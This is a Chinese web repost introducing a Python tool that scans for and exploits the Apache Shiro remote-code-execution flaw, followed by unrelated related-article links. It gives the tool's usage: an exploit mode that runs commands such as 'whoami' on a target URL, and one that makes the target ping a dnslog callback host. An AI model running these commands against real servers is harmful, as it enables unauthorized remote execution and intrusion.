一个简单的Shiro RCE检测和利用脚本-电子发烧友网

一个简单的Shiro RCE检测和利用脚本

0x01 工具介绍

一个简单的Shiro RCE检测和利用脚本。

0x02 安装与使用

1、安装需要的包

pip install -r requirements.txt

2、检查该漏洞

python ShiroRceTool.py -m scan -u "http://example.com"

3、执行命令 (不回显)

python ShiroRceTool.py -m exploit -u "http://example.com" -c "ping dnslog.example.com"

4、执行命令（尝试回显）

python ShiroRceTool.py -m exploit -u "http://example.com" -c "whoami" -e

5、获取帮助 - Get help

python ShiroRceTool.py
 ____  _     _           ____         _____           _
/ ___|| |__ (_)_ __ ___ |  _  ___ __|_   _|__   ___ | |
\___ | '_ | | '__/ _ | |_) / __/ _ | |/ _  / _ | |
 ___) | | | | | | | (_) |  _ < (_|  __/| | (_) | (_) | |
|____/|_| |_|_|_|  \___/|_| _\___\___||_|\___/ \___/|_|


                        By: Hack3rHan


usage: ShiroRceTool.py [-h] [-m MODE] [-u URL] [-c CMD] [-e]


options:
  -h, --help            show this help message and exit
  -m MODE, --mode MODE  "exploit" or "scan".
  -u URL, --url URL     URL of the target.
  -c CMD, --cmd CMD     Command to execute.
  -e, --echo            Echo mode.

审核编辑：汤梓红

声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。举报投诉

检测

检测

+关注

关注
5

文章
4436

浏览量
91367
命令

命令

+关注

关注
5

文章
678

浏览量
21983
脚本

脚本

+关注

关注
1

文章
387

浏览量
14830

原文标题：一个简单的Shiro RCE检测和利用脚本。

文章出处：【微信号：菜鸟学安全，微信公众号：菜鸟学安全】欢迎添加关注！文章转载请注明出处。

工作中这种检测脚本太常见了

写一个检测脚本，用来检测本机所有磁盘分区读写是否都正常。

发表于 11-07 09:42 •328次阅读

Lua脚本简单介绍

Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中，从而为应用程序提供灵活的扩展和定制功能。Lua脚

发表于 08-20 06:37

Lua脚本简单介绍

Lua简单介绍Lua[1]是一个小巧的脚本语言。作者是巴西人。该语言的设计目的是为了嵌入应用程序中，从而为应用程序提供灵活的扩展和定制功能。Lua脚

发表于 08-20 08:06

基于DirectShow技术的RCE算法视频加密方案

本文设计了一种利用DirectShow 技术结合一种新的RCE 算法实现视频数据加密的方案。首先介绍了RCE 算法的加密解密过程和原理，然后

发表于 06-26 08:52 •35次下载

shiro简单教程，环境搭建，权限控制，登陆验证

shiro简单教程，环境搭建，权限控制，登陆验证

发表于 09-09 08:18 •9次下载

Apache Shiro框架的详细资料说明

对新的用户机制并不熟悉，导致出现问题时耗费了大量的时间来进行修复。因此，我认为我有必要编写此文来介绍一下新的 Shiro 用户机制。

发表于 03-08 08:00 •4次下载

如何创建和执行一个简单的Linux shell脚本

　如果您愿意要尝试更长的shell脚本，请将下面的shell脚本（并附加为PDF和ODT文件）复制到文本编辑器中，保存，使其可执行并运行。当您了解更多Linux命令时，您可以创建更复杂的shell脚本。

发表于 11-06 17:28 •1.3w次阅读

如何巧妙利用HFSS脚本录制功能

。摘要：在学个Antenna：HFSS脚本建模入门中，介绍了利用HFSS自带的Record Script To File功能进行脚本录制。但是大部分情况下，工程师们只是希望录制

发表于 07-29 11:15 •3214次阅读

109个实用shell脚本分享

Shell脚本,就是利用Shell的命令解释的功能，对一个纯文本的文件进行解析，然后执行这些功能，也可以说Shell脚本就是

发表于 03-16 08:58 •2589次阅读

如何创建一个简单的脚本

Shell 脚本可以为您节省时间和精力，但是如果您不保护您的密码，它们就会成为您的负担。以下是如何保持安全的方法。

发表于 10-10 11:12 •8431次阅读

shiro综合利用工具介绍

shiro综合利用工具：ShiroExp 工具介绍 shiro一把梭工具，该轮子主要有三大功能如下: 1、默认密钥爆破利用Simple

发表于 10-24 11:14 •5303次阅读

利用Python写了一个监控服务器资源利用率的脚本！

研究了一个脚本，其主要目的是：基于 Python 编程语言来监控服务器的 CPU、内存、/目录、/appslog、/bigdata目录使用率以及网卡接收和发送情况。

发表于 01-29 15:08 •660次阅读

shiro如何实现Web应用认证

前面简单介绍了shiro这个框架的一些基本知识，包括其架构模型，主要的功能，关键名称的含义，以及核心模块和对应的接口定义。开始的话今天我们从一个

发表于 10-08 14:53 •486次阅读

Shiro功能介绍

记得做的第一个Web项目，系统认证授权这块就是基于Shiro实现的，当时也是第一次接触到这种类型的框架，同时是基于Spring做的集成，并且相关的配置都已经是定制好的，只需要我们根据项目情况对极少

发表于 10-08 15:07 •466次阅读

编写一个点名器脚本

目的：编写一个脚本，可以将准别好的名字合集的.txt传入脚本，然后每次随机显示一个人的姓名

发表于 11-06 12:41 •563次阅读